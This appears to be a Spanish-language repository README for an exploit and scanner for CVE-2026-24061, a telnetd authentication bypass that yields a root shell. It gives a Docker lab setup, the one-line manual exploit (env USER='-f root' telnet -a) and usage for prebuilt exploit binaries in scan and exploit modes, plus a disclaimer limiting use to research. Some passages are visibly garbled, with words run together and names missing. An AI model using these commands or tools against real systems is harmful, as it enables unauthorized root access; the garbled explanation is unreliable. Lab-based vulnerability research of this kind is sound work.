
Exploit y escáner para CVE-2026-24061, una omisión de autenticación en telnetd que otorga shell root mediante una variable de entorno USER manipulada. Incluye configuración del entorno Docker y binarios de exploit multiplataforma.
CVE-2026-24061 es una vulnerabilidad de omisión de autenticación en telnetd que permite a los atacantes eludir la verificación de identidad mediante combinaciones específicas de variables de entorno y obtener directamente un shell con privilegios de root.
Existe una falla en la lógica de autenticación de telnetd. Cuando se utiliza la opción -a (inicio de sesión automático) combinada con una variable de entorno USER específica (como -f root), es posible omitir el proceso de autenticación normal e iniciar sesión directamente como usuario root.
GNU InetUtils es una colección de herramientas de red básicas bajo el proyecto GNU. Contiene muchos clientes y demonios de red tradicionales, como ftp, telnet, rsh, rlogin, , etc., proporcionando una biblioteca integral de componentes de red con estilo GNU. es el programa servidor de este kit de herramientas encargado de manejar las solicitudes de conexión Telnet entrantes, con la tarea principal de proporcionar a los usuarios remotos una interfaz de terminal interactiva (generalmente un Shell).
tftptelnetdinetd o xinetd en el puerto 23. Cuando llega una solicitud, se inicia telnetd.login subyacente del sistema para verificar el nombre de usuario y la contraseña.Primero, descargue este repositorio localmente. La estructura de directorios es la siguiente:

En este directorio, ejecute el siguiente comando para iniciar el entorno vulnerable para CVE-2026-24061:
docker compose up -d --build

Después del inicio, el servicio telnet se ejecutará en 0.0.0.0:2323

-a de telnetd se utiliza para habilitar la funcionalidad de inicio de sesión automático-a está habilitado, telnetd lee la variable de entorno USER como nombre de usuario de inicio de sesiónUSER se establece en -f root, telnetd interpreta incorrectamente -f como un indicador de opción y root como el usuario objetivo# Establezca la variable de entorno USER y conéctese con telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323
Al tener éxito, obtendrá un shell interactivo con privilegios de root:

cd exp

Puede ver tres archivos: exp, exp_darwin y exp.exe son archivos ejecutables para Linux, Mac y Windows respectivamente. Elija el que necesite. También se proporciona el código fuente de la herramienta. Si necesita otras versiones, puede compilarlas usted mismo. Aquí estoy usando exp para Linux, que tiene información de ayuda detallada.

Detectar si la vulnerabilidad existe (escanea el puerto 23 por defecto):
./exp -mode scan -target your-ip -port your-port

Explotar la vulnerabilidad y obtener un shell:
./exp -mode exploit -target your-ip -port your-port

Este proyecto es solo para fines de investigación de seguridad y educación. No lo use en sistemas no autorizados. Los usuarios asumen toda la responsabilidad legal por cualquier consecuencia resultante del uso de esta herramienta.